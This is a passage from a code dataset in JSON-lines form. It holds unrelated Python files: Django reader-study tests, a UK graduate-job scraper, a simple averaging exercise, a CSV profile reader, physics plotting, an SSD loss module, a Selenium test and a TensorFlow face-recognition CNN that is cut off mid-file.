\"\n\n\n@pytest.mark.django_db\ndef test_case_text_is_scrubbed(client):\n u = UserFactory()\n im, im1 = ImageFactory(), ImageFactory()\n rs = ReaderStudyFactory(\n case_text={\n im.name: \"My Help Text\",\n \"not an image name\": \"Shouldn't appear in result\",\n im1.name: \"Doesn't belong to this study so ignore\",\n }\n )\n rs.images.add(im)\n rs.add_reader(u)\n\n response = get_view_for_user(client=client, url=rs.api_url, user=u)\n\n assert response.status_code == 200\n # Case should be indexed with the api url\n assert response.json()[\"case_text\"] == {\n im.api_url: \"

My Help Textnaughty

\"\n }\n\n\n@pytest.mark.django_db\ndef test_validate_answer():\n u = UserFactory()\n im1, im2, im3 = ImageFactory(), ImageFactory(), ImageFactory()\n rs = ReaderStudyFactory(\n hanging_list=[\n {\"main\": im1.name, \"main-overlay\": im3.name},\n {\"main\": im2.name, \"main-overlay\": im3.name},\n ]\n )\n rs.images.set([im1, im2, im3])\n rs.add_reader(u)\n\n q = QuestionFactory(\n reader_study=rs,\n answer_type=Question.AnswerType.BOOL,\n question_text=\"q1\",\n )\n\n answer = AnswerFactory(creator=u, question=q, answer=True,)\n answer.images.set([im1, im3])\n\n with pytest.raises(ValidationError) as e:\n Answer.validate(\n creator=u, question=q, answer=True, images=[im1, im3],\n )\n assert (\n e.value.message\n == f\"User {u} has already answered this question for this set of images.\"\n )\n\n assert (\n Answer.validate(creator=u, question=q, answer=True, images=[im2, im3],)\n is None\n )\n\n\n@pytest.mark.django_db\ndef test_validate_hanging_list():\n im1, im2, im3 = ImageFactory(), ImageFactory(), ImageFactory()\n rs = ReaderStudyFactory(\n hanging_list=[\n {\"main\": im1.name, \"main-overlay\": im3.name},\n {\"main\": im2.name, \"main-overlay\": im3.name},\n ]\n )\n rs.images.set([im1, im2, im3])\n\n assert rs.hanging_list_valid is False\n\n rs.validate_hanging_list = False\n assert rs.hanging_list_valid is True\n","sub_path":"app/tests/reader_studies_tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":13144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"67670552","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nimport xml.etree.cElementTree as ET\nfrom xml.etree import ElementTree\nfrom xml.dom import minidom\nimport html\nimport json\nimport re\n\n\nclass All:\n def __init__(self):\n pass\n\n def prettify(self, elem):\n \"\"\"Return a pretty-printed XML string for the Element.\n \"\"\"\n rough_string = ElementTree.tostring(html.unescape(elem), 'utf-8')\n rep = minidom.parseString(rough_string)\n return rep.toprettyxml(indent=\" \")\n\n def generator_xml(self, lines, filename):\n root = ET.Element(\"jobs\")\n\n for line in lines:\n ET.SubElement(root, \"job\", {\n 'Employer': line[0],\n 'Title': line[1],\n 'Sector': line[2],\n 'Location': line[3],\n 'Provider': line[4],\n 'Link': line[5]\n })\n\n output_file = open(filename, 'w')\n output_file.write(self.prettify(root))\n output_file.close()\n\n def brightnetwork(self):\n initial_url = 'https://www.brightnetwork.co.uk/search/?job_types=1'\n page = 0\n provider = 'Brightnetwork'\n lines = []\n urls = []\n while True:\n page += 1\n url = initial_url + '&offset=%s' % page\n if url in urls:\n continue\n urls.append(url)\n initial_soup = BeautifulSoup(requests.request('GET', url=url).content, 'html5lib')\n rows = initial_soup.select('.search-result-row')\n if rows:\n for row in rows:\n try:\n employer_link = 'https://www.brightnetwork.co.uk' + row.find('a', {'class': 'result-link'})[\n 'href']\n print(employer_link)\n link_soup = BeautifulSoup(requests.request('GET', url=employer_link).content, 'html5lib')\n title = link_soup.select('.page-header')[0].text.replace(' - ', ' ').strip()\n employer = link_soup.find('div', {'class': 'field-related-company'}).a.text.strip()\n sector = link_soup.find('div', {'class': 'field-sectors'}).find(\n class_='field-item').text.strip()\n location = link_soup.find('div', {'class': 'field-locations'}).find(\n class_='field-item').text.replace('\\n', ' ').replace(' ', '').strip()\n line = [employer, title, sector, location, provider, employer_link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n except Exception as e:\n print(e)\n continue\n else:\n break\n\n def target(self):\n initial_url = 'https://targetjobs.co.uk/search/all/group_facet/Vacancies?page='\n page = 0\n provider = 'TARGETjobs'\n urls = []\n lines = []\n while True:\n page += 1\n url = initial_url + str(page)\n print(page, url)\n soup = BeautifulSoup(requests.get(url=url).content, 'html5lib')\n views = soup.select('.views-row')\n if not views:\n break\n for view in views:\n if view.select('div.pane-content > a'):\n employer = view.select('div.pane-content > a')[0].text.strip()\n job = view.select('div.pane-content > h3 >a')[0]\n title = job.text.strip()\n link = 'https://targetjobs.co.uk' + job['href']\n if link in urls:\n continue\n urls.append(link)\n link_soup = BeautifulSoup(requests.get(url=link).content, 'html5lib')\n if link_soup.find('div', {'class': 'field-name-field-ad-vac-locations'}):\n location = link_soup.find('div', {'class': 'field-name-field-ad-vac-locations'}).find('div', {\n 'class': 'field-item'}).text.strip()\n else:\n location = link_soup.find('div', {'class': 'field-name-taxonomy-vocabulary-73'}).find('div', {\n 'class': 'field-item'}).text.strip()\n sector = ''\n if link_soup.select('a.sector.name'):\n sectors = link_soup.select('a.sector.name')\n for s in sectors:\n sector += s.text.strip() + '|'\n sector = sector[:-1]\n line = [employer, title, sector, location, provider, link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def milkround(self):\n initial_url = 'https://www.milkround.com/'\n soup = BeautifulSoup(requests.request('GET', url=initial_url).content, 'html5lib')\n sector_links = soup.select('div#sectorTabContent a')\n sectors = []\n locations = []\n lines = []\n provider = 'Milkround'\n for sector_link in sector_links:\n sector = sector_link.text.strip()\n sectors.append(sector)\n location_url = 'https://www.milkround.com/jobs/'\n headers = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/80.0.3987.122 Safari/537.36 '\n }\n res = requests.request('GET', url=location_url, headers=headers).text\n l_soup = BeautifulSoup(res, 'html5lib')\n l_url = l_soup.select('ul#Popular_locations a')\n for loc in l_url:\n locations.append(loc.text)\n for sec in sectors:\n for loc in locations:\n url = location_url + sec.replace(' ', '-').lower() + '/in-' + loc.replace(' ', '-').lower()\n response = requests.request('GET', url=url, headers=headers)\n url_soup = BeautifulSoup(response.content, 'html5lib')\n cards = url_soup.find_all('div', {'class': 'job'})\n print(url)\n for card in cards:\n title = card.find('div', {'class': 'job-title'}).text.replace('\\n', '').replace(' ', '').strip()\n link = card.find('div', {'class': 'job-title'}).a['href']\n employer = card.find('li', {'class': 'company'}).text.strip()\n location = card.find('li', {'class': 'location'}).text.replace('\\n', '').replace(' ', '').replace('from updateupdate', '').strip()\n line = [employer.replace(' - ', ' '), title.replace(' - ', ' '), sec.replace(' - ', ' '),\n location.replace(' - ', ' '), provider, link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def prospects(self):\n initial_url = 'https://www.prospects.ac.uk/browse-graduate-jobs'\n initial_soup = BeautifulSoup(requests.request('GET', url=initial_url).content, 'html5lib')\n cards = initial_soup.select('.list-browse-courses-jobs li')\n provider = 'Prospects'\n lines = []\n for card in cards:\n if 'All sectors' in card.text:\n continue\n sector = card.span.text.strip()\n sector_link = 'https://www.prospects.ac.uk' + card.a['href']\n sector_soup = BeautifulSoup(requests.get(url=sector_link).content, 'html5lib')\n all_link = 'https://www.prospects.ac.uk' + sector_soup.select('.list-browse-courses-jobs li')[0].a['href']\n link_soup = BeautifulSoup(requests.get(url=all_link).content, 'html5lib')\n rows = link_soup.select('.list-unstyled > li')\n print(all_link)\n for row in rows:\n title = row.find(attrs={'class': 'card-secondary-title'}).text.strip()\n employer = row.find(class_='card-secondary-meta').li.text.strip()\n link = 'https://www.prospects.ac.uk' + row.a['href']\n soup = BeautifulSoup(requests.get(url=link).content, 'html5lib')\n if soup.find(class_='dl'):\n dd = soup.find(class_='dl').dl.find_all('dd')\n location = ''\n for d in dd:\n location += d.text.strip() + '|'\n line = [employer, title, sector, location[:-1], provider, link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def gradcracker(self):\n initial_url = 'https://www.gradcracker.com/search/all-disciplines/engineering-jobs'\n initial_soup = BeautifulSoup(requests.get(url=initial_url).content, 'html5lib')\n lis = initial_soup.select('ul.group-disciplines > ul >li')\n provider = 'Gradcracker'\n lines = []\n for li in lis:\n sector = li.span.find(text=True, recursive=False)\n page = 0\n while True:\n page += 1\n sector_link = 'https://www.gradcracker.com' + li.a['href'] + '?page={}'.format(page)\n sector_soup = BeautifulSoup(requests.get(url=sector_link).content, 'html5lib')\n last_page = int(sector_soup.select('.pagination > li')[-2].text)\n if page > last_page:\n break\n result_cards = sector_soup.find_all('div', {'class': ['result-card']})\n print(sector_link)\n for result_card in result_cards:\n if result_card.has_attr('class') and 'carousel' in result_card['class']:\n continue\n if result_card.find(attrs={'class': 'masthead'}):\n employer = result_card.find(attrs={'class': 'masthead'})['title'].split('with')[1].strip()\n else:\n employer = ''\n jobs = result_card.find_all(attrs={'class': 'job'})\n for job in jobs:\n if job.find('h2'):\n title = job.find('h2').text.replace('\\n', ' ').replace(' ', '').strip()\n job_link = job.h2.find('a')['href']\n job_soup = BeautifulSoup(requests.get(url=job_link).content, 'html5lib')\n location = job_soup.find('span', attrs={'title': 'Location'}).parent.find('span', {\n 'class': 'font-semibold'}).find(text=True, recursive=False).strip()\n line = [employer, title, sector, location, provider, job_link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}_Again.xml'.format(provider))\n\n def gradcracker_process(self):\n tree = ElementTree.parse('xml/Gradcracker.xml').getroot()\n links = []\n lines = []\n for item in tree.iter('job'):\n employer = item.attrib['Employer']\n title = item.attrib['Title']\n sector = item.attrib['Sector']\n location = item.attrib['Location']\n provider = item.attrib['Provider']\n link = item.attrib['Link']\n if link not in links:\n links.append(link)\n line = [employer, title, 'Engineering', location, provider, link]\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='Gradcracker.xml')\n\n def GRB(self):\n post_url = 'https://www.grb.uk.com/index.php?id=1635&position_type=Full-Time&isExperienced=0&division_cond=0&is_external=0&and_or_condition='\n page = 0\n provider = 'GRB'\n lines = []\n urls = []\n while True:\n page += 1\n print(page)\n payload = {\n 'page': page\n }\n res = requests.post(url=post_url, data=payload).text\n data = json.loads(res)['vacancies']\n print(data)\n if data is None:\n break\n for vacancy in data:\n title = vacancy['title']\n url = 'https://www.grb.uk.com/graduate-jobs/' + vacancy['jobUrl']\n if url in urls:\n continue\n urls.append(url)\n print(page, url)\n soup = BeautifulSoup(requests.get(url=url).content, 'html5lib')\n emp = soup.find('b', text=re.compile('Company:')).parent\n emp.find('b').decompose()\n employer = emp.text.strip()\n loc = soup.find('b', text=re.compile('Location:')).parent\n loc.find('b').decompose()\n location = loc.text.strip()\n sec = soup.find('b', text=re.compile('Job Category:')).parent\n sec.find('b').decompose()\n sector = sec.text.replace('\\n', '').replace('\\t', '').strip()\n line = [employer, title, sector, location, provider, url + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def graduate(self):\n initial_url = 'https://www.graduate-jobs.com/jobs/?page='\n page = 0\n urls = []\n lines = []\n provider = 'Graduate Jobs'\n while True:\n page += 1\n url = initial_url + str(page)\n soup = BeautifulSoup(requests.get(url=url).content, 'html5lib')\n items = soup.find_all('li', {'class': 'job-list__item'})\n if not items:\n break\n if url in urls:\n continue\n urls.append(url)\n print(url)\n for item in items:\n title = item.find('span', {'class': 'job-list__title'}).text.strip()\n emp = item.find('p', {'class': 'job-list__company'})\n if emp.find('span', {'class': 'job-list__rank'}):\n emp.find('span', {'class': 'job-list__rank'}).decompose()\n employer = emp.text.strip()\n link = 'https://www.graduate-jobs.com' + item.find('a', {'class': 'job-list__link'})['href']\n link_soup = BeautifulSoup(requests.get(url=link).content, 'html5lib')\n loc = link_soup.find('dt', text=r'Location:').parent\n loc.find(class_='job-page-overview__title').decompose()\n location = loc.dd.text.strip()\n sec = link_soup.find('dt', text=r'Sectors:').parent\n sec.find(class_='job-page-overview__title').decompose()\n sector = sec.dd.text.strip()\n line = [employer, title, sector, location, provider, link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def Debut(self):\n initial_url = 'https://jobs.debut.careers'\n initial_soup = BeautifulSoup(requests.get(url=initial_url).content, 'html5lib')\n sectors = initial_soup.select('#industry_sector-container > li > a')\n lines = []\n for sec in sectors:\n sector = sec.text.strip()\n sec_url = initial_url + sec['href'] + '-from_'\n count = -29\n provider = 'Debut'\n while True:\n count += 30\n url = sec_url + str(count)\n print(url)\n soup = BeautifulSoup(requests.get(url=url).content, 'html5lib')\n cards = soup.find_all('a', {'class': 'job-card'})\n if not cards:\n break\n for card in cards:\n link = 'https://jobs.debut.careers/' + card['href']\n title = card.select('.details .position')[0].text.strip()\n employer = card.select('.details .description')[0].text.split('·')[0].strip()\n location = card.select('.details .description')[0].text.split('·')[2].strip()\n line = [employer, title, sector, location, provider, link + '||View']\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def gradtouch(self):\n path = 'HTML/gradtouch.html'\n file = open(file=path)\n data = file.read()\n soup = BeautifulSoup(data, 'html5lib')\n cards = soup.find_all('li', {'class': 'c-tile--reg'})\n provider = 'Gradtouch'\n lines = []\n for card in cards:\n link = card.a['href']\n print(link)\n employer = card.find(class_='c-jobTile__title--reg').text.strip()\n title = card.find(class_='c-tile__subtitle--reg').text.strip()\n loc = card.find('ul', class_='c-jobTile__locations')\n location = ''\n if loc:\n sub_ls = loc.find_all('li')\n for sub_l in sub_ls:\n location += sub_l.text + ', '\n location = location.strip()[:-1].strip()\n else:\n location = card.find('span', {'class': 'c-jobTile__locationText'}).text.strip()\n line = [employer, title, '', location, provider, link]\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='{}.xml'.format(provider))\n\n def Add(self):\n path = 'xml/'\n for origin, directories, files in os.walk(path):\n file_list = files\n lines = []\n for file in file_list:\n print(file, '===========================================================================')\n base_tree = ElementTree.parse(path + file).getroot()\n for item in base_tree.iter('job'):\n employer = item.attrib['Employer']\n title = item.attrib['Title']\n sector = item.attrib['Sector']\n location = item.attrib['Location']\n provider = item.attrib['Provider']\n link = item.attrib['Link']\n line = [employer, title, sector, location, provider, link]\n if line not in lines:\n print(line)\n lines.append(line)\n self.generator_xml(lines=lines, filename='Total.xml')\n\n\nif __name__ == '__main__':\n print('=============================Start===============================')\n a = All()\n a.brightnetwork()\n a.target()\n a.milkround()\n a.prospects()\n a.gradcracker()\n a.GRB()\n a.graduate()\n a.Debut()\n # a.gradtouch()\n a.Add()\n print('============================= The End ===========================')\n","sub_path":"xml_scrape.py","file_name":"xml_scrape.py","file_ext":"py","file_size_in_byte":19610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"56661895","text":"#Exercício 4\n\n#Faça um algoritmo que calcule e escreva a média aritmética dos números inteiros entre 15 (inclusive) e 100 (inclusive).\n\nsoma = 0\ncontador = 0\n\n\nfor i in range(15,101):\n soma = soma + i\n contador = contador + 1\nnum = soma / contador\n\nprint(\"A média é: \" + str(num))\n\n# print(contador)\n\n\n\n","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"183117539","text":"import csv\nimport random\ndef readprofiles():\n f = open(\"MOCK_DATA.csv\",\"r\")\n s = f.read()[:-1]\n f.close()\n profiles = []\n people = s.split(\"\\n\")\n a = \"\"\n for person in people:\n person = person.split(\",\")\n profile = {}\n profile[\"id\"] = person[0]\n profile[\"first\"] = person[1]\n profile[\"last\"] = person[2]\n profile[\"email\"] = person[3]\n profile[\"country\"] = person[4]\n profile[\"ip\"] = person[5]\n profiles.append(profile)\n return profiles\n\ndef randomprofile():\n profiles = readprofiles()\n profileNum = random.randint(0,99)\n return profiles[profileNum]\n\ndef searchprofile(name):\n i = 1\n fixedName=\"\"\n while (i < len(name)):\n if name[i].isupper():\n fixedName = name[:i] + \" \" + name[i:]\n i+=1\n name = fixedName.split(\" \")\n profiles = readprofiles()\n for person in profiles:\n if person[\"first\"]==name[0] and person[\"last\"]==name[1]:\n return person\n return {\n \"id\": \"\",\n \"first\": \"Does Not Exist\",\n \"last\": \"\",\n \"email\": \"\",\n \"country\": \"\",\n \"ip\": \"\"}\n\n","sub_path":"5/06_jquery_data/ho_gerstein/readfile.py","file_name":"readfile.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"297278687","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 25 17:23:26 2020\n\n@author: ramiro\n\"\"\"\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams, cycler\n\n\nif os.name == 'posix':\n Linux = True\n\nplt.rc('text', usetex=Linux)\nplt.rc('font', family='serif')\n\nTitleSize = 15\nAxisLabelSize = 15\nLegendSize = 12\n\n# Para una transición suave de colores entre las curvas:\nN_curvas = 7 # cantidad de curvas\ncmap = plt.cm.plasma #coolwarm, viridis, plasma, inferno, magma, cividis\nrcParams['axes.prop_cycle'] = cycler(color=cmap(np.linspace(0, 1, N_curvas)))\n\nrho = [0.36, 0.46, 0.58, 0.75, 0.9, 1]\n\n# Gráfico de E_tot:\n\nplt.figure()\n\nfor r in rho:\n data = np.loadtxt('Barrido(T=0.1-2.5,rho=%g).dat'%r, skiprows=1, delimiter=' ', unpack=False)\n\n Ekin = data[:,0]\n Epot = data[:,1]\n Etot = data[:,2]\n Temp = data[:,3]\n Pres = data[:,4]\n a=len(Ekin)\n iteracion=np.linspace(1,a,a)\n \n\n plt.plot(Temp,Etot, label=r'$\\rho = %g$'%r)\n\nplt.xlabel(r'Temperatura', fontsize=AxisLabelSize)\nplt.ylabel(r'$E_{tot}$', fontsize=AxisLabelSize)\nplt.title(r'', fontsize=TitleSize)\n\nplt.legend(loc='best', fontsize=LegendSize)\nplt.grid(axis='both', color='k', linestyle='dashed', linewidth=2, alpha=0.2)\nplt.show()\n\nplt.savefig('E_tot.png')\n\n# Gráfico de Presión:\n\nplt.figure()\n\nfor r in rho:\n data = np.loadtxt('Barrido(T=0.1-2.5,rho=%g).dat'%r, skiprows=1, delimiter=' ', unpack=False)\n\n Ekin = data[:,0]\n Epot = data[:,1]\n Etot = data[:,2]\n Temp = data[:,3]\n Pres = data[:,4]\n a=len(Ekin)\n iteracion=np.linspace(1,a,a)\n \n\n plt.plot(Temp, Pres, label=r'$\\rho = %g$'%r)\n\nplt.xlabel(r'Temperatura', fontsize=AxisLabelSize)\nplt.ylabel(r'Presión', fontsize=AxisLabelSize)\nplt.title(r'', fontsize=TitleSize)\n\nplt.legend(loc='best', fontsize=LegendSize)\nplt.grid(axis='both', color='k', linestyle='dashed', linewidth=2, alpha=0.2)\nplt.show()\n\nplt.savefig('Presion.png')","sub_path":"3 - Dinámica Molecular/Nuevos Códigos/Barridos(Energía y Presión)/Barridos.py","file_name":"Barridos.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"344224978","text":"# -*- coding: utf-8 -*-\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom data import coco as cfg\nfrom ..box_utils import match, log_sum_exp, decode, nms\n\n\nclass PrecisionLoss(nn.Module):\n \"\"\"SSD Weighted Loss Function\n Compute Targets:\n 1) Produce Confidence Target Indices by matching ground truth boxes\n with (default) 'priorboxes' that have jaccard index > threshold parameter\n (default threshold: 0.5).\n 2) Produce localization target by 'encoding' variance into offsets of ground\n truth boxes and their matched 'priorboxes'.\n 3) Hard negative mining to filter the excessive number of negative examples\n that comes with using a large number of default bounding boxes.\n (default negative:positive ratio 3:1)\n Objective Loss:\n L(x,c,l,g) = (Lconf(x, c) + αLloc(x,l,g)) / N\n Where, Lconf is the CrossEntropy Loss and Lloc is the SmoothL1 Loss\n weighted by α which is set to 1 by cross val.\n Args:\n c: class confidences,\n l: predicted boxes,\n g: ground truth boxes\n N: number of matched default boxes\n See: https://arxiv.org/pdf/1512.02325.pdf for more details.\n \"\"\"\n\n def __init__(self, num_classes, overlap_thresh, prior_for_matching,\n bkg_label, top_k, encode_target, nms_thresh, conf_thresh,\n use_gpu=True):\n super(PrecisionLoss, self).__init__()\n self.use_gpu = use_gpu\n self.num_classes = num_classes\n self.threshold = overlap_thresh\n self.background_label = bkg_label\n self.encode_target = encode_target\n self.use_prior_for_matching = prior_for_matching\n self.variance = cfg['variance']\n self.top_k = top_k\n if nms_thresh <= 0:\n raise ValueError('nms_threshold must be non negative.')\n self.nms_thresh = nms_thresh\n self.softmax = nn.Softmax(dim=-1)\n self.conf_thresh = conf_thresh\n\n def forward(self, predictions, targets):\n \"\"\"Multibox Loss\n Args:\n predictions (tuple): A tuple containing loc preds, conf preds,\n and prior boxes from SSD net.\n conf shape: torch.size(batch_size,num_priors,num_classes)\n loc shape: torch.size(batch_size,num_priors,4)\n priors shape: torch.size(num_priors,4)\n\n targets (tensor): Ground truth boxes and labels for a batch,\n shape: [batch_size,num_objs,5] (last idx is the label).\n \"\"\"\n loc_data, conf_data, priors = predictions\n# torch.save(loc_data, 'inter/loc_data.pt')\n# torch.save(conf_data, 'inter/conf_data.pt')\n# torch.save(priors, 'inter/priors.pt')\n# torch.save(targets, 'inter/targets.pt')\n num = loc_data.size(0)\n priors = priors[:loc_data.size(1), :]\n # confused here, why stuck at loc_data size 1\n num_priors = (priors.size(0))\n# prior_data = priors.view(1, num_priors, 4)\n# print(prior_data.size())\n num_classes = self.num_classes\n\n # match priors (default boxes) and ground truth boxes\n loc_t = torch.Tensor(num, num_priors, 4)\n # [num, num_priors, 4]\n conf_t = torch.LongTensor(num, num_priors) \n # [num_priors] top class label for each prior\n for idx in range(num):\n truths = targets[idx][:, :-1].data\n labels = targets[idx][:, -1].data\n defaults = priors.data\n match(self.threshold, truths, defaults, self.variance, labels,\n loc_t, conf_t, idx)\n if self.use_gpu:\n loc_t = loc_t.cuda()\n conf_t = conf_t.cuda()\n # wrap targets\n loc_t = Variable(loc_t, requires_grad=False)\n conf_t = Variable(conf_t, requires_grad=False)\n \n conf_preds = self.softmax(conf_data.view(num, num_priors,\n self.num_classes))\n # print(conf_preds.max()) 0.98\n conf_preds_trans = conf_preds.transpose(2,1)\n # [num, num_classes, num_priors]\n conf_p = torch.zeros(num, num_priors, num_classes).cuda()\n # [num, num_priors, num_classes]\n loc_p = torch.zeros(num, num_priors, 4).cuda()\n # Decode predictions into bboxes\n for i in range(num): \n decoded_boxes = decode(loc_data[i], priors, self.variance)\n # For each class, perform nms\n conf_scores = conf_preds_trans[i].clone()\n for cl in range(1, self.num_classes):\n c_mask = conf_scores[cl].gt(self.conf_thresh)\n scores = conf_scores[cl][c_mask]\n if scores.size(0) == 0:\n continue\n # fliter low conf predictions\n l_mask = c_mask.unsqueeze(1).expand_as(decoded_boxes)\n boxes = Variable(decoded_boxes[l_mask].view(-1, 4), requires_grad=False)\n # idx of highest scoring and non-overlapping boxes per class\n # boxes [num_priors(has been flitered), 4] location preds for i'th image\n ids, count = nms(boxes, scores, self.nms_thresh, self.top_k)\n conf_p[i, c_mask, cl] = conf_preds[i, c_mask, cl] # [num, num_priors, num_classes]\n loc_p[i, l_mask[:,0].nonzero()[ids][:count]] = loc_data[i, l_mask[:,0].nonzero()[ids][:count]] # [num, num_priors, 4]\n # check each result if match the ground truth\n effect_conf = conf_p.sum(2) != 0\n effect_conf_idx = effect_conf.unsqueeze(2).expand_as(conf_p)\n effect_loc_idx = effect_conf.unsqueeze(2).expand_as(loc_t)\n # [num, num_priors, num_classes] binary metric, thousands will be True in million\n# torch.save(conf_preds, 'inter/conf_preds.pt')\n# torch.save(effect_conf, 'inter/effect_conf.pt')\n# torch.save(effect_loc, 'inter/effect_loc.pt')\n# torch.save(conf_p, 'inter/conf_p.pt')\n# torch.save(conf_t, 'inter/conf_t.pt')\n# torch.save(effect_conf, 'inter/effect_conf.pt')\n loss_c = F.cross_entropy(conf_p[effect_conf_idx].view(-1, num_classes), conf_t[effect_conf].view(-1), size_average=False)\n loss_l = F.smooth_l1_loss(loc_p[effect_loc_idx], loc_t[effect_loc_idx], size_average=False)\n # conf_p [num*num_p, num_classes] conf_t [num*num_p, 1(label)]\n N = effect_conf_idx.data.sum()\n loss_l /= N.float()\n loss_c /= N.float()\n return loss_l, loss_c\n","sub_path":"layers/modules/precision_loss.py","file_name":"precision_loss.py","file_ext":"py","file_size_in_byte":6553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"536616013","text":"import unittest\nfrom selenium import webdriver\n\nclass BaseTestCase(unittest.TestCase):\n def setUp(self):\n # create a new Firefox session\n self.driver = webdriver.Chrome()\n self.driver.implicitly_wait(30)\n self.driver.maximize_window()\n\n # Navigate to the application homepage\n self.driver.get('http://demo-store.seleniumacademy.com/')\n\n def test_enter_text(self):\n input_text = \"//input[@name='q']\"\n self.search_field = self.driver.find_element_by_xpath(input_text)\n # self.search_field.click()\n self.search_field.clear()\n self.search_field.send_keys('earphones')\n self.search_field.submit()\n\n def tearDown(self):\n # close the browser window\n self.driver.quit()\n","sub_path":"test_searchfield.py","file_name":"test_searchfield.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"562623784","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 16 16:26:03 2018\n# 对于梯度耗尽的问题 进行改善\n@author: Administrator\n\"\"\"\nimport cv2 \nimport os,glob\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom skimage import color,transform\n\ntf.reset_default_graph()\n\nw = 44\nh = 36\nc = 1\nsuffix = '/*.jpg'\n#test_path = \"E:/BaiduYunDownload/ORL/ORL_test/\"\n#train_path = \"E:/BaiduYunDownload/ORL/ORL_train/\"\ntest_path = \"E:/BaiduYunDownload/mylibrary/test/\"\ntrain_path = \"E:/BaiduYunDownload/mylibrary/train/\"\n\ndef read_image(path,w,h,c):\n \n label_dir = [path+x for x in os.listdir(path) if os.path.isdir(path+x)]\n images = []\n labels = []\n for index,folder in enumerate(label_dir):\n for img in glob.glob(folder+suffix):\n image = cv2.imread(img)\n image = color.rgb2gray(image)\n image = transform.resize(image,(w,h,c))\n images.append(image)\n labels.append(index)\n return np.asarray(images,dtype=np.float32),np.asarray(labels,dtype=np.int32)\n \ntrain_data,train_label = read_image(train_path,w,h,c)\ntrain_image_num = len(train_data)\ntrain_image_index = np.arange(train_image_num)\nnp.random.shuffle(train_image_index)\ntrain_data = train_data[train_image_index]\ntrain_label = train_label[train_image_index]\n\ntest_data,test_label = read_image(test_path,w,h,c)\ntest_image_num = len(test_data)\ntest_image_index = np.arange(test_image_num)\nnp.random.shuffle(test_image_index)\ntest_data = test_data[test_image_index]\ntest_label = test_label[test_image_index]\n\ndef inference(input_tensor,regularizer,keep_prob):\n \n with tf.variable_scope('layer1-conv1'):\n conv1_weights = tf.get_variable('weight',[5,5,1,6],initializer=tf.truncated_normal_initializer(stddev=0.1))\n conv1_biases = tf.get_variable('bias',[6],initializer=tf.constant_initializer(0.0))\n conv1 = tf.nn.conv2d(input_tensor,conv1_weights,strides=[1,1,1,1],padding='VALID')\n relu1 = tf.nn.relu(tf.nn.bias_add(conv1,conv1_biases))\n \n with tf.name_scope('layer2-pool1'):\n pool1 = tf.nn.max_pool(relu1,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')\n \n pool_shape = pool1.get_shape().as_list()\n nodes = pool_shape[1]*pool_shape[2]*pool_shape[3]\n reshaped = tf.reshape(pool1,[-1,nodes])\n \n with tf.variable_scope('layer3-fc1'):\n fc3_weights = tf.get_variable('weight',[nodes,120],initializer=tf.truncated_normal_initializer(stddev=0.1))\n if regularizer != None:\n tf.add_to_collection('losses',regularizer(fc3_weights))\n fc3_biases = tf.get_variable('bias',[120],initializer=tf.truncated_normal_initializer(stddev=0.1))\n fc3_out = tf.matmul(reshaped,fc3_weights) + fc3_biases\n \n dropout_out = tf.nn.dropout(fc3_out, keep_prob)\n \n with tf.variable_scope('layer4-fc2'):\n fc4_weights = tf.get_variable('weight',[120,9],initializer=tf.truncated_normal_initializer(stddev=0.1))\n if regularizer != None:\n tf.add_to_collection('losses',regularizer(fc4_weights))\n fc4_biases = tf.get_variable('bias',[9],initializer=tf.truncated_normal_initializer(stddev=0.1))\n out = tf.matmul(dropout_out,fc4_weights) + fc4_biases\n \n return out\n\ndef get_batch(data,label,batch_size):\n for start_index in range(0,len(data)-batch_size+1,batch_size):\n slice_index = slice(start_index,start_index+batch_size)\n yield data[slice_index],label[slice_index]\n\nkeep_prob = tf.placeholder(\"float\",name='keep_prob')\nx = tf.placeholder(tf.float32,[None,w,h,c],name='x') \ny_ = tf.placeholder(tf.int32,[None],name='y_')\n\nregularizer = tf.contrib.layers.l2_regularizer(0.001)#L2正则化 减少网络结构 防止过拟合\ny = inference(x,regularizer,keep_prob) 